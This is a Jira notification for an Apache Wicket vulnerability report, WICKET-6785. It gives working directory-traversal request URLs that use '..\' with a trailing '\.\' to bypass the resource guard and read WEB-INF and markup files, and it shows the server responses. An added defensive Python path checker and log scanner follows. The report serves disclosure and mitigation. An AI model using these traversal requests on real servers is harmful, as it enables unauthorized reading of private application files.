[ 
https://issues.apache.org/jira/browse/WICKET-6785?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Mariusz Popłwski updated WICKET-6785:
-------------------------------------
    Summary: Wicket directory traversal to root package - read file out of 
scope  (was: Wicket directory traversal to root package - read wicker markup 
files)

> Wicket directory traversal to root package - read file out of scope
> -------------------------------------------------------------------
>
>                 Key: WICKET-6785
>                 URL: https://issues.apache.org/jira/browse/WICKET-6785
>             Project: Wicket
>          Issue Type: Bug
>          Components: wicket-core
>    Affects Versions: 9.0.0-M5
>         Environment: Default installation of wicket from  
> https://wicket.apache.org/start/quickstart.html
> Allows reproducing the above vulnerability.
> mvn archetype:generate -DarchetypeGroupId=org.apache.wicket 
> -DarchetypeArtifactId=wicket-archetype-quickstart -DarchetypeVersion=9.0.0-M5 
> -DgroupId=com.mycompany -DartifactId=myproject 
> -DarchetypeRepository=https://repository.apache.org/ -DinteractiveMode=false
>            Reporter: Mariusz Popłwski
>            Priority: Major
>         Attachments: project_root.png, wicket-poc1.png, wicket-poc2.png, 
> wicket-poc3.png
>
>
> An unauthorized user is allowed to read files out of the allowed scope by combining 
> directory traversal with a bypass of the guard protection.
>  
> The security risk is medium due to the next layer of protection, the guard's default 
> file extension white list; if that restriction is bypassed, this security 
> vulnerability may be critical. We are even allowed to ask the server to serve 
> WEB-INF\web.xml, but the guard blocks our attempt.
>  
> The user is able to escape the root by using directory traversal "..\..\"; the key 
> of the vulnerability is to use the "\.\" current directory mark at the end of the 
> query, which leads to bypassing the guard protection.
>  
> *Proofs of concept.*
>  
> Request:
>  
> {code:java}
> https://192.168.1.11:8443/wicket/resource/org.apache.wicket.Application/..\..\..\.\WEB-INF\web.xml{code}
>  
>  
> {code:java}
> org.apache.wicket.request.resource.PackageResource$PackageResourceBlockedException:
>  Access denied to (static) package resource ././WEB-INF/web.xml. See 
> IPackageResourceGuard{code}
>  
>  
> Request:
>  
> {code:java}
> https://192.168.1.11:8443/wicket/resource/org.apache.wicket.Application/..\..\..\.\WEB-INF\file_in_web_inf.txt{code}
>  
> Response:
>  
> {code:java}
> HTTP/1.1 200 OK
> Connection: close
> Date: Thu, 14 May 2020 11:37:34 GMT
> Last-Modified: Thu, 14 May 2020 11:36:38 GMT
> Expires: Fri, 14 May 2021 11:37:34 GMT
> Cache-Control: private
> Cache-Control: max-age=31536000
> Pragma: cache
> Content-Disposition: inline
> Content-Type: text/plain
> Accept-Range: bytes
> Content-Length: 4
> Server: Jetty(9.4.27.v20200227)
> 1337
> {code}
>  
> My app structure:
>  
> {code:java}
> src/
>     main/
>         java/
>             com.mycompany/
>                 fileupload/
>                 FileUploadPanel.class
>                 HomePage.class
>                 HomePage.html
>                 WicketApplication.class
>             javaroot.png
>         resource/
>         webapp/
>             WEB-INF/
>                 file_in_web_inf.txt
>                 web.xml
>     test/
> {code}
>  
>  
>  
> *Bypass file read block by guard from java/ packages dir.*
> ------------------------
>  Trying to read file "javaroot.png" from java/ folder
>  Request:
>  
> {code:java}
> https://192.168.1.11:8443/wicket/resource/com.mycompany.HomePage/..\..\javaroot.png{code}
> *Server log:*
>  
>  
> {code:java}
> [qtp1521118594-25] WARN org.apache.wicket.markup.html.PackageResourceGuard - Access to root directory is by default disabled for shared resources: javaroot.png
> [qtp1521118594-25] WARN RequestCycleExtra - ********************************
> [qtp1521118594-25] WARN RequestCycleExtra - Handling the following exception
> org.apache.wicket.request.resource.PackageResource$PackageResourceBlockedException: Access denied to (static) package resource javaroot.png. See IPackageResourceGuard
>   at org.apache.wicket.request.resource.PackageResource.internalGetResourceStream(PackageResource.java:584)
> {code}
>  
>  
> User Output:
>  
> {code:java}
> Last cause: Access denied to (static) package resource javaroot.png. See 
> IPackageResourceGuard<br/>{code}
>  
>  
> Bypass using \.:
>  
> {code:java}
> https://192.168.1.11:8443/wicket/resource/com.mycompany.HomePage/..\..\.\javaroot.png
> {code}
> User partial output:
>  
> {code:java}
> HTTP/1.1 200 OK
> Connection: close
> Date: Thu, 14 May 2020 11:09:14 GMT
> Last-Modified: Wed, 13 May 2020 18:11:09 GMT
> Expires: Fri, 14 May 2021 11:09:14 GMT
> Cache-Control: private
> Cache-Control: max-age=31536000
> Pragma: cache
> Content-Disposition: inline
> Content-Type: image/png
> Accept-Range: bytes
> Content-Length: 12244
> Server: Jetty(9.4.27.v20200227)
> ‰PNG.....
> {code}
>  
>  
>  
> *Bypass markup file read block guard*
> ------------------------
>  
> Directory traversal allows us to get into another package, but we are still 
> forbidden from previewing Wicket markup files.
>  
> {code:java}
> https://192.168.1.11:8443/wicket/resource/org.apache.wicket.Application/..\..\..\com/mycompany/HomePage.html?{code}
>  
> Error on server side:
>  
> {code:java}
> [qtp1521118594-30] WARN org.apache.wicket.markup.html.PackageResourceGuard - 
> Access denied to shared (static) resource because it is a Wicket markup file: 
> com/mycompany/HomePage.html{code}
>  
> User output:
>  
> {code:java}
> Last cause: Access denied to (static) package resource 
> com/mycompany/HomePage.html. See IPackageResourceGuard<br/>{code}
>  
> Bypass:
>  
> {code:java}
> https://192.168.1.11:8443/wicket/resource/org.apache.wicket.Application/..\..\..\.\com/mycompany/HomePage.html?{code}
>  
> User output:
>  
>  
> {code:java}
> HTTP/1.1 200 OK
> Connection: close
> Date: Thu, 14 May 2020 11:10:05 GMT
> Last-Modified: Thu, 14 May 2020 10:54:40 GMT
> Expires: Fri, 14 May 2021 11:10:05 GMT
> Cache-Control: private
> Cache-Control: max-age=31536000
> Pragma: cache
> Content-Disposition: inline
> Content-Type: text/html
> Accept-Range: bytes
> Content-Length: 640
> Server: Jetty(9.4.27.v20200227)
> <!DOCTYPE html>
> <html xmlns:wicket="http://wicket.apache.org">
> <head>
>   <meta charset="utf-8" />
>   <title>Apache Wicket Quickstart</title>
>   <link href='http://fonts.googleapis.com/css?family=Yanone+Kaffeesatz:regular,bold' rel='stylesheet' type='text/css' />
>   <link rel="stylesheet" href="style.css" type="text/css" media="screen" title="Stylesheet" />
> </head>
> <body>
>   <div id="hd">
>     <div id="logo">
>       <img src="logo.png" width="50px" height="50px" alt="Wicket Logo" />
>       <h1>Apache Wicket</h1>
>     </div>
>   </div>
>   <div id="bd">
>     <div wicket:id="fileUpload"></div>
>   </div>
>   <div id="ft"> </div>
> </body>
> </html>
> {code}
>  
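The report above hinges on two things: a resource path that still contains `..` segments reaching the guard, and a trailing `\.\` segment that makes the remaining check see a "current directory" path instead of the traversed one. The following is an added example, written here for defenders and not code from the report or from the Wicket project: it unifies both separators, percent-decodes, and rejects any `.` or `..` segment outright instead of resolving it, then applies guard-style checks (root directory, WEB-INF/META-INF, markup files, an extension allow list) in the same spirit as the messages quoted in the report. A second function runs the same check over a few constructed access-log lines so the pattern can be alerted on. All function names, the extension lists and the log lines are assumptions, not Wicket's API or the reporter's server logs.

```python
"""Added example (not Wicket's own code): reject-dot-segment path check for
static resource paths, plus a scan that flags the traversal pattern in logs.
All names, lists and sample data here are hypothetical/constructed."""
from __future__ import annotations

import re
from urllib.parse import unquote

# Assumed allow list of static extensions, in the spirit of the guard's
# default extension white list the report mentions (values are assumptions).
ALLOWED_EXTENSIONS = {"png", "jpg", "gif", "css", "js", "txt", "ico"}
# Wicket refuses to serve markup files as static resources; mirror that.
MARKUP_EXTENSIONS = {"html"}
# Container-private directories that must never be served.
FORBIDDEN_PREFIXES = ("WEB-INF/", "META-INF/")


def normalize_segments(raw: str) -> list[str]:
    """Percent-decode (twice, to catch %252e), treat '\\' and '/' alike,
    and split into segments. Decoding happens before splitting so
    '%2e%2e' or '%5c' cannot hide a traversal from the checks below."""
    decoded = unquote(unquote(raw))
    unified = decoded.replace("\\", "/")
    return [seg for seg in unified.split("/") if seg != ""]


def check_resource_path(raw: str) -> tuple[bool, str]:
    """Return (allowed, reason) for a package-relative resource path.

    Any '.' or '..' segment is rejected as a whole rather than resolved, so
    a trailing '\\.\\' cannot make an already-traversed path look like a
    harmless current-directory reference to a later check."""
    decoded = unquote(unquote(raw))
    if decoded.startswith(("/", "\\")) or re.match(r"^[A-Za-z]:", decoded):
        return False, "absolute path"
    segments = normalize_segments(raw)
    if not segments:
        return False, "empty path"
    if any(seg in (".", "..") for seg in segments):
        return False, "dot segment"
    if any("\x00" in seg for seg in segments):
        return False, "NUL byte"
    clean = "/".join(segments)
    if clean.upper().startswith(FORBIDDEN_PREFIXES):
        return False, "container directory"
    if len(segments) == 1:
        # Same policy as "Access to root directory is by default disabled".
        return False, "root directory"
    name = segments[-1]
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext in MARKUP_EXTENSIONS:
        return False, "markup file"
    if ext not in ALLOWED_EXTENSIONS:
        return False, "extension not allowed"
    return True, "ok"


# Constructed access-log lines (not the report's real logs). The first two
# reuse the request paths shown in the report; statuses are made up.
SAMPLE_LOG = "\n".join([
    r'10.0.0.5 - - [14/May/2020:11:37:34 +0000] "GET /wicket/resource/org.apache.wicket.Application/..%5C..%5C..%5C.%5CWEB-INF%5Cweb.xml HTTP/1.1" 500 120',
    r'10.0.0.5 - - [14/May/2020:11:09:14 +0000] "GET /wicket/resource/com.mycompany.HomePage/..\..\.\javaroot.png HTTP/1.1" 200 12244',
    r'10.0.0.9 - - [14/May/2020:11:12:01 +0000] "GET /wicket/resource/com.mycompany.HomePage/style.css HTTP/1.1" 200 1203',
])

REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (?P<target>\S+) HTTP/')
RESOURCE_PREFIX = "/wicket/resource/"


def flag_traversal_requests(log_text: str) -> list[tuple[int, str]]:
    """Return (line_no, reason) for each resource request whose relative
    path contains a dot segment. Only the raw URL-relative path is seen
    here (not the resolved package path), so just the dot-segment reason
    is meaningful for alerting, whether or not the guard let it through."""
    hits: list[tuple[int, str]] = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = match.group("target").split("?", 1)[0]
        if not target.startswith(RESOURCE_PREFIX):
            continue
        # Remaining form is "<scope class>/<relative path>"; drop the scope.
        _scope, _, rel = target[len(RESOURCE_PREFIX):].partition("/")
        allowed, reason = check_resource_path(rel)
        if not allowed and reason == "dot segment":
            hits.append((line_no, reason))
    return hits


if __name__ == "__main__":
    for path in (r"..\..\..\.\WEB-INF\web.xml", r"..\..\.\javaroot.png",
                 "com/mycompany/HomePage.html", "com/mycompany/logo.png"):
        print(path, "->", check_resource_path(path))
    print(flag_traversal_requests(SAMPLE_LOG))
```

The design point is that a check which resolves `.` and `..` before deciding has to get the resolution exactly right for every separator and encoding the container accepts; a check that refuses any dot segment in a package-relative resource path has nothing to get wrong, because no legitimate shared-resource reference needs one.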



--
This message was sent by Atlassian Jira
(v8.3.4#803005)
